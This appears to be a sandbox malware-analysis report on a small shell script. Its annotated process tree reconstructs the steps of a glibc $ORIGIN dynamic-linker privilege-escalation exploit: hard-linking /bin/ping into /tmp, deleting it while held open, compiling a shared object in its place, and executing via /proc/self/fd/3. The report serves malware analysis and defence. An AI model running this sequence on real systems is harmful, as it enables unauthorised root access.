Analysis

  • max time kernel
    0s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64  arch:i386  image:ubuntu1804-amd64-en-20211208  kernel:4.15.0-161-generic  locale:en-us  os:ubuntu-18.04-amd64  system
  • submitted
    27-11-2022 12:57

General

  • Target

    xiang/1.sh

  • Size

    404B

  • MD5

    fa4f1798d03844cc950c5c0ff1ed71a7

  • SHA1

    7b7bb83c614603989d91a77ac0405d4000a0fa75

  • SHA256

    a5b0146024e8974f15f29c835f5d2d272a199846fa04963bb05d7e0bd14620ff

  • SHA512

    e94e75ade995e3ed08e1fcff6a830dbb28e512091d72af14bbf19ae6b6a33381130bda2c9b38050e61fc9dcf82e25ba06fb8d8f15edd4edeb1a7c1a675a8139e

Score
5/10 — note: this score is driven only by the two generic signatures below (/tmp writes, /proc reads). Neither captures what the process tree actually shows, so treat the score as an underestimate and read the Processes section.

Malware Config (no configuration extracted for this sample)

Signatures

  • Reads runtime system information 3 IoCs

    Reads data from the /proc virtual filesystem. Here the reads are `ls -l /proc/593/fd/3` (the script inspecting its own open file descriptor, before and after deleting the file it points to) and the final execution of `/proc/self/fd/3`; the signature fires on the path, not on the technique.

  • Writes file to tmp directory 17 IoCs

    Malware often drops required files in the /tmp directory. In this run most of the 17 hits are gcc/as/ld temporaries (/tmp/cc*.s, /tmp/cc*.o, /tmp/cc*.res); the interesting writes are the hard link /tmp/exploit/target and the shared object compiled to /tmp/exploit after that directory was removed.

Processes

  Analyst note: read in order, the tree below is a deliberate sequence, not generic /tmp staging. The script hard-links /bin/ping to /tmp/exploit/target, holds it open as fd 3 of its own process (PID 593), deletes the directory, compiles a shared object at the same path /tmp/exploit, and finally executes the deleted link via /proc/self/fd/3 without forking. This is consistent with the public proof-of-concept for the glibc dynamic-linker $ORIGIN / LD_AUDIT privilege-escalation bug (CVE-2010-3847); the environment variable that would confirm it is not captured in this listing, the program.c contents are not shown, and the glibc shipped in the Ubuntu 18.04 image should not be affected, which fits the absence of any child process (e.g. a shell) after the final exec.

  • /tmp/xiang/1.sh
    /tmp/xiang/1.sh
    1⤵
    • Writes file to tmp directory
    PID:593
    • /bin/rm
      rm -r -f /tmp/exploit
      2⤵
      • Writes file to tmp directory
      PID:594
    • /bin/mkdir
      mkdir /tmp/exploit
      2⤵
      • Reads runtime system information
      PID:595
    • /bin/ln
      ln /bin/ping /tmp/exploit/target    (hard link, not a copy: the new name shares the inode of /bin/ping, so any privilege bits on /bin/ping carry over to /tmp/exploit/target — whether /bin/ping is setuid or uses file capabilities on this image is not shown here)
      2⤵
        PID:596
      • /bin/ls
        ls -l /proc/593/fd/3    (PID 593 is 1.sh itself; fd 3 is presumably the hard-linked target opened with a shell redirection, which is a builtin and therefore does not appear as a separate process)
        2⤵
        • Reads runtime system information
        PID:597
      • /bin/rm
        rm -rf /tmp/exploit
        2⤵
        • Writes file to tmp directory
        PID:598
      • /bin/ls
        ls -l /proc/593/fd/3    (repeated after `rm -rf /tmp/exploit`; the descriptor stays valid and the link target would now be reported as "(deleted)")
        2⤵
        • Reads runtime system information
        PID:599
      • /bin/cat
        cat    (no arguments — stdin/stdout are redirected; given that gcc compiles program.c next, this is most likely a here-document writing program.c, whose contents the report does not capture)
        2⤵
          PID:600
      • /usr/bin/gcc
        gcc -w -fPIC -shared -o /tmp/exploit program.c    (builds a shared object at /tmp/exploit — the same path as the directory removed two steps earlier; `-w` suppresses warnings, `-shared` means this is a library to be loaded, not a standalone executable)
          2⤵
          • Writes file to tmp directory
          PID:601
      • /usr/lib/gcc/x86_64-linux-gnu/7/cc1
        /usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu program.c -quiet -dumpbase program.c "-mtune=generic" "-march=x86-64" -auxbase program -w -fPIC -fstack-protector-strong -Wformat -Wformat-security -o /tmp/ccKZJpcf.s
        1⤵
        • Writes file to tmp directory
        PID:602
      • /usr/local/sbin/as, /usr/local/bin/as, /usr/sbin/as — same PID 607 as the entry below; these are PATH-search exec attempts for `as` by the gcc driver, not separate processes. Only /usr/bin/as actually ran.
        as -W --64 -o /tmp/ccX15Hao.o /tmp/ccKZJpcf.s
        1⤵
          PID:607
        • /usr/local/bin/as
          as -W --64 -o /tmp/ccX15Hao.o /tmp/ccKZJpcf.s
          1⤵
            PID:607
          • /usr/sbin/as
            as -W --64 -o /tmp/ccX15Hao.o /tmp/ccKZJpcf.s
            1⤵
              PID:607
            • /usr/bin/as
              as -W --64 -o /tmp/ccX15Hao.o /tmp/ccKZJpcf.s
              1⤵
              • Writes file to tmp directory
              PID:607
            • /usr/lib/gcc/x86_64-linux-gnu/7/collect2    (gcc's link wrapper; it invokes /usr/bin/ld below with the same arguments, so the two entries are one link step, producing the shared object /tmp/exploit with `-z relro`)
              /usr/lib/gcc/x86_64-linux-gnu/7/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccC3E8ax.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -shared -z relro -o /tmp/exploit /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccX15Hao.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o
              1⤵
              • Writes file to tmp directory
              PID:608
            • /usr/bin/ld
              /usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccC3E8ax.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -shared -z relro -o /tmp/exploit /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccX15Hao.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o
              1⤵
              • Writes file to tmp directory
              PID:609
            • /proc/self/fd/3
              /proc/self/fd/3    (executes the deleted hard link of /bin/ping through the still-open descriptor; PID 593 is the script's own PID, so this was an `exec` that replaced the shell rather than a child. This is the step where a vulnerable dynamic linker would resolve $ORIGIN to /tmp/exploit — now the freshly built shared object — and load it; no further child process is recorded, consistent with the image not being affected.)
              1⤵
                PID:593

              Network (no network events are listed for this run; the sample's behaviour is entirely local)

              MITRE ATT&CK Matrix (no techniques were mapped automatically; based on the process tree an analyst would plausibly tag this as Exploitation for Privilege Escalation, T1068 — the sample builds and stages a local exploit rather than exhibiting any network or persistence behaviour)
